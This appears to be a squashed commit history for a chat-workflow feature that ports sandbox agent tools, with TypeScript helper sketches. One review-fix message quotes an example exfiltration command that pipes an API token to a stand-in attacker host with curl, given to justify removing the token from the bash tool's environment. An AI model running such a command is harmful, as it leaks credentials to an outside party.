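- **`isAnthropicModel` body.** The predicate's logic is a hypothetical guess based on gateway-style ids such as `anthropic/...`.

```typescript
// Hypothetical shapes: anything that can carry AI SDK-style providerOptions.
type ProviderOptionsLike = Record<string, Record<string, unknown>>;
interface CacheableLike {
  providerOptions?: ProviderOptionsLike;
  [key: string]: unknown;
}

const EPHEMERAL = { type: "ephemeral" } as const;

// Assumption: gateway ids look like "anthropic/claude-..."; the real predicate may differ.
export function isAnthropicModel(modelId: string): boolean {
  const id = modelId.toLowerCase();
  return id.startsWith("anthropic/") || id.includes("claude");
}

// Returns a copy with Anthropic cache control merged in; the input is not mutated.
function withCacheControl<T extends CacheableLike>(item: T): T {
  return {
    ...item,
    providerOptions: {
      ...item.providerOptions,
      anthropic: { ...item.providerOptions?.anthropic, cacheControl: EPHEMERAL },
    },
  };
}

// Mark only the last tool: one breakpoint covers the whole tool block,
// conserving Anthropic's 4-breakpoint limit.
export function addCacheControlToTools<T extends CacheableLike>(
  tools: Record<string, T>,
): Record<string, T> {
  const names = Object.keys(tools);
  const lastName = names[names.length - 1];
  const lastTool = lastName === undefined ? undefined : tools[lastName];
  if (lastName === undefined || lastTool === undefined) return tools;
  return { ...tools, [lastName]: withCacheControl(lastTool) };
}

// Mark the final message so each step can reuse the cached prefix.
export function addCacheControlToMessages<T extends CacheableLike>(messages: T[]): T[] {
  const lastIndex = messages.length - 1;
  return messages.map((message, index) =>
    index === lastIndex ? withCacheControl(message) : message,
  );
}
```

The commit wires the tool wrapper in once per step and the message wrapper inside `prepareStep`. Gating both on `isAnthropicModel` seems to be the predicate's role, although the commit does not spell that out.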

…ver bundle (#602) * feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. 
Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. 
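The `extractOrgId` helper listed above (`org-<slug>-<uuid>` → uuid, lowercased) can be sketched with one anchored regex. A later commit derives `recoupOrgId` from `session.clone_url`. For that reason, this sketch assumes the input may be a full clone URL and uses only its last path segment without `.git`. It also returns `null` on no match. Both behaviors are assumptions, not confirmed behavior of the real helper.

```typescript
// Greedy ".+" backtracks so the capture is always the trailing UUID,
// even when the slug itself contains hex-looking words.
const ORG_REPO_PATTERN =
  /^org-.+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;

export function extractOrgId(repoRef: string): string | null {
  // Assumption: accept full clone URLs by keeping only the last path segment.
  const lastSegment = repoRef.replace(/\/+$/, "").split("/").pop() ?? "";
  const repoName = lastSegment.replace(/\.git$/i, "");
  const match = ORG_REPO_PATTERN.exec(repoName);
  return match?.[1]?.toLowerCase() ?? null;
}
```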
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). 
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. 
Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. 
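The `where` split behind the type-depth fix can be sketched as a pure partition. SQL `column = NULL` never matches, so null-valued keys must become `IS NULL` filters. The other keys can go through a single `.match(...)`. This sketch is untyped: it uses `Record<string, unknown>` instead of `Partial<Tables<"chats">>`. The name `splitWhere` is hypothetical. It also assumes `undefined` values mean "no filter".

```typescript
// Partition a `where` predicate: non-null values feed one `.match(matches)`
// call; each entry in nullColumns becomes `.is(column, null)`.
export function splitWhere(where: Record<string, unknown>): {
  matches: Record<string, unknown>;
  nullColumns: string[];
} {
  const matches: Record<string, unknown> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === undefined) continue; // omitted keys impose no filter
    if (value === null) nullColumns.push(column);
    else matches[column] = value;
  }
  return { matches, nullColumns };
}
```

For the compare-and-set claim, a predicate such as `{ id: chatId, active_stream_id: null }` splits into one equality match on `id` and one `IS NULL` check on `active_stream_id`. The update therefore only lands when no stream is active.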
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. 
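The foreground-only env injection in `bashTool` can be sketched as follows. This version already reflects the review commit that follows, which drops `RECOUP_ACCESS_TOKEN`, so only `RECOUP_ORG_ID` is exported. `ExecRequest`, `prepareExec`, and the `detached` flag are hypothetical names for illustration. They are not api's Sandbox interface.

```typescript
// Hypothetical context slice; only the org id is exported to commands.
interface RecoupContextLike {
  recoupOrgId?: string;
}

export function buildRecoupExecEnv(ctx: RecoupContextLike): Record<string, string> {
  return ctx.recoupOrgId ? { RECOUP_ORG_ID: ctx.recoupOrgId } : {};
}

interface ExecRequest {
  command: string;
  detached: boolean;
  env?: Record<string, string>;
}

// Foreground commands get the Recoup env; detached processes outlive the
// prompt, so they are started without it.
export function prepareExec(
  command: string,
  detached: boolean,
  ctx: RecoupContextLike,
): ExecRequest {
  return detached
    ? { command, detached }
    : { command, detached, env: buildRecoupExecEnv(ctx) };
}
```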
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. 
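The tightened `isAgentContext` guard from the P2 fix can be sketched as a structural check. It requires `sandbox.state` to be a non-null object and `sandbox.workingDirectory` to be a non-empty string, so `{ sandbox: {} }` no longer passes. The `AgentContextLike` shape is a hypothetical minimum. The real `AgentContext` carries more fields.

```typescript
// Hypothetical, minimal shape: the real AgentContext carries more fields.
interface AgentContextLike {
  sandbox: { state: object; workingDirectory: string };
}

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

export function isAgentContext(value: unknown): value is AgentContextLike {
  if (!isRecord(value) || !isRecord(value.sandbox)) return false;
  const { state, workingDirectory } = value.sandbox;
  // Reject the old false positive: an empty sandbox object.
  return isRecord(state) && typeof workingDirectory === "string" && workingDirectory.length > 0;
}
```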
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. 
New tool files (one tool per file, per sweetman SRP):

- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):

- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
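The two helpers listed in the PR 5 description are small enough to sketch directly. This is a hedged approximation, not the repo's code. The signatures are assumptions: a single string for `shellEscape`, and an absolute path plus a working directory for `toDisplayPath`. Returning `"."` for the working directory itself is also an assumption.

```typescript
// Wrap an argument in single quotes for a POSIX shell. Inside single quotes
// nothing is special except the quote itself, so each ' becomes '\'' :
// close the quote, emit an escaped quote, reopen the quote.
function shellEscape(arg: string): string {
  return `'${arg.replace(/'/g, `'\\''`)}'`;
}

// Show paths under the working directory relative to it; leave others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  // Require a "/" after the root so "/work-other" is not treated as inside "/work".
  if (absolutePath.startsWith(`${root}/`)) {
    return absolutePath.slice(root.length + 1);
  }
  return absolutePath;
}
```

For example, a search command could be assembled as `grep -rn -E ${shellEscape(pattern)} ${shellEscape(dir)}`. A pattern such as `it's` then stays one shell word and cannot break out of its argument.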
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):

- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model.
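The `skillTool` content pipeline (extractSkillBody → injectSkillDirectory → substituteArguments) might look roughly like the sketch below. Only the order of the three steps and the `Skill directory:` header text come from the commit. The following are assumptions for illustration: the frontmatter regex, the blank line after the header, the trimming, and the `renderSkillContent` wrapper.

```typescript
// Drop a leading `---` ... `---` frontmatter block if there is one.
function extractSkillBody(content: string): string {
  const frontmatter = /^---\r?\n(?:[\s\S]*?\r?\n)?---(?:\r?\n|$)/;
  return content.replace(frontmatter, "").trim();
}

// Prepend the directory header so relative paths in the skill can be resolved.
function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

// Replace every $ARGUMENTS. split/join avoids String.replace interpreting
// `$&`-style patterns that may appear inside user-supplied arguments.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical wrapper showing the order the commit describes.
function renderSkillContent(raw: string, skillDirectory: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(raw), skillDirectory),
    args,
  );
}
```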
Wire-up:

- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:

- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

- ${workingDirectory}/.claude/skills/ (project, claude-style)
- ${workingDirectory}/.agents/skills/ (project, agents-style)
- ${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
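For the `parseSkillFrontmatter.ts` entry in PR 6, a hand-rolled YAML subset parser of the kind described (key:value lines, quoted strings, booleans, colons preserved in URLs) could be sketched as below. This is an assumption-laden approximation. It keeps keys verbatim, since the commit places camelCase normalization in `frontmatterToOptions`. It also skips blank and `#` comment lines and does not handle nested YAML or multi-line values.

```typescript
type FrontmatterValue = string | boolean;

function parseSkillFrontmatter(content: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  const block = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
  if (!block) return result;

  for (const rawLine of (block[1] ?? "").split(/\r?\n/)) {
    const line = rawLine.trim();
    if (line === "" || line.startsWith("#")) continue;

    // Split on the FIRST colon only, so "https://..." values keep their colons.
    const colon = line.indexOf(":");
    if (colon <= 0) continue;
    const key = line.slice(0, colon).trim();
    const value = line.slice(colon + 1).trim();

    if (value === "true" || value === "false") {
      result[key] = value === "true";
      continue;
    }
    // Strip one matching pair of surrounding single or double quotes.
    const quoted = value.match(/^(["'])(.*)\1$/);
    result[key] = quoted ? quoted[2] : value;
  }
  return result;
}
```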
Changes:

- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:

- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
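After the YAGNI change, directory resolution reduces to a single global path. Below is a hedged sketch. A hypothetical `resolveHome` callback stands in for the real `resolveSandboxHomeDirectory`, whose signature is not shown here. The sketch keeps the `/root` fallback from the earlier commit and the trailing-slash tolerance that the `getGlobalSkillsDirectory` tests are described as covering.

```typescript
// Join $HOME and the global skills folder, tolerating a trailing slash on $HOME.
function getGlobalSkillsDirectory(homeDirectory: string): string {
  const home = homeDirectory.replace(/\/+$/, "");
  return `${home}/.agents/skills`;
}

// `resolveHome` is a stand-in for however the sandbox's $HOME is looked up.
async function getSandboxSkillDirectories(
  resolveHome: () => Promise<string | undefined>,
): Promise<string[]> {
  const home = (await resolveHome()) || "/root";
  return [getGlobalSkillsDirectory(home)];
}
```

With the home directory observed on preview, `getGlobalSkillsDirectory("/home/vercel-sandbox")` yields the `/home/vercel-sandbox/.agents/skills` path where the two global skills were installed.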
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

